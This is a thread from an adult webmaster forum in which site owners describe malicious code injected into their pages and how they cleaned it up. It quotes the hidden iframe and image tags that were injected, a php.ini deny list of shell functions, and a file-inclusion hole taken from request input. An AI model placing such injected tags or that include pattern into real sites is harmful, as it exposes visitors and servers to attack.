![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
Confirmed User
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
|
People Who inject Stuff into PHP
Anyone ever seen that happen from these guys?
Registrant: Kipec Ineara [email protected] +1.2128816540 Ineara inc 933 po box New York,NY,US 10081 this is what was injected iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"</iframe |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#2 |
Too lazy to set a custom title
Industry Role:
Join Date: Sep 2005
Location: Springfield
Posts: 13,826
|
just hate that injection shit....
never cared much about the code than how to clean it and prevent from happening again...
__________________
Make a bank with Chaturbate - the best selling webcam program ![]() ![]() ![]() Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!! PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email: ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
Confirmed User
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
|
Yea backups ... Luckily it was a personal site and i keep multiple backups
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Location: Poland
Posts: 9,228
|
99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.
__________________
Mechanical Bunny Media Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#5 |
Confirmed User
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
|
eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.
__________________
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#6 |
Affordable Content!
Industry Role:
Join Date: Dec 2001
Location: Tucson, Arizona
Posts: 1,750
|
That happened to me big-time last month. Every site of mine got hit. Every single index.html or index.php file on my server had random lines of code inserted. It royally fucked-up a few of my sites that used link exchange programs. Hugely annoying. It happened every day for a week. I spent countless hours trying to figure out what was going on. Fixing everything over and over again was a major bitch.
When I asked my hosting company about it (Colo-Cation, the best hosting company ever) they looked into it and told me that, as k0nr4d said, it was more than likely a virus on my own machine that was causing the issue. I ran a virus scan and changed every password on my server and it hasn't happened since.
__________________
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#7 |
Confirmed User
Join Date: Sep 2006
Posts: 2,746
|
this is shit
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#8 | |
Confirmed User
Industry Role:
Join Date: Aug 2006
Location: Poland
Posts: 9,228
|
Quote:
That being said it's almost always a virus with this kind of thing. If not the site owner, then a designer or programmer they hired, an updater, anyone with ftp access. The first thing anyone should do is change all their passwords as soon as something like this happens.
__________________
Mechanical Bunny Media Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#9 | |
Confirmed User
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
|
Quote:
I havent used FTP in a good while ... I have scp program i use ... I secured Php on the machine ! |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#10 |
Junior Achiever
Industry Role:
Join Date: Nov 2004
Location: Walled Garden
Posts: 17,066
|
I had this happen on 12/06 on one my smaller sites. No other sites on the server were hit with it.
<img width=0 height=0 src="http://*REMOVED*.com/count.gif?id=*REMOVED*"> I was hit with malware around the same time... |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#11 | |
Junior Achiever
Industry Role:
Join Date: Nov 2004
Location: Walled Garden
Posts: 17,066
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#12 |
Confirmed User
Join Date: Jan 2002
Location: Ny
Posts: 4,113
|
I got hit hard on my tgps.. they kept changing the top 2 rows to trafficshop and other urls.. took a while but seems that my host found the backdoors
Very annoying
__________________
Hey surfers how about some The Best Porn Sites |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#13 |
ICQ:649699063
Industry Role:
Join Date: Mar 2003
Posts: 27,763
|
It sucks. Don't inject the wrong thing.
__________________
Send me an email: [email protected] |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#14 |
Confirmed User
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#15 |
Confirmed User
Industry Role:
Join Date: Mar 2008
Posts: 2,450
|
i think this is the case most of the times. not our pc. bots scan for holes in scripts.also the server you host or even one account one host can be compromised.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#16 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Location: Nassau, Bahamas
Posts: 3,133
|
![]() Yes, I've heard that injecting stuff into your PeePee hurts.
I wouldn't recommend it. ![]()
__________________
![]() ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#17 |
Too lazy to set a koala
Industry Role:
Join Date: Jan 2007
Location: CZ/EU forever!
Posts: 16,139
|
they must be a doctors
![]()
__________________
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#18 |
Confirmed User
Industry Role:
Join Date: Feb 2003
Location: JustPorno
Posts: 2,384
|
Yeah I've seen it before, will kill your SE listings as google will flag those sites as dangerous.
__________________
Just Porno with both classic and mobile porn versions. Gay Porn Our mega gay site tranny porn |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#20 |
Confirmed User
Industry Role:
Join Date: Jan 2004
Location: Europe
Posts: 671
|
Have had it happen in the past but the server folk ran a script to clean it up though it did take a few days as we had so much stuff on our servers. We are still with Webair and I think Webair have really got their security sorted out now.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#21 |
Confirmed User
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
|
added this to php.ini
disable_functions=readfile,shell_exec,exec,virtual ,passthru,proc_close,proc_get_status,proc_open,pro c_terminate,system |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#22 |
Confirmed User
Industry Role:
Join Date: Jan 2003
Location: Los Angeles
Posts: 736
|
lol, my favorite is finding pages with
<?php include_once($_REQUEST['page']); ?>
__________________
Tanguy 0x7a69 inc. Programmer/President/CEO http://www.0x7a69.com A Leader in Programming since 1996 PHP, Ruby on Rails, MySQL, PCI DSS, and any Technical Consulting |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#23 | |
Promoting Debate on GFY
Industry Role:
Join Date: Apr 2007
Posts: 27,173
|
Quote:
__________________
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |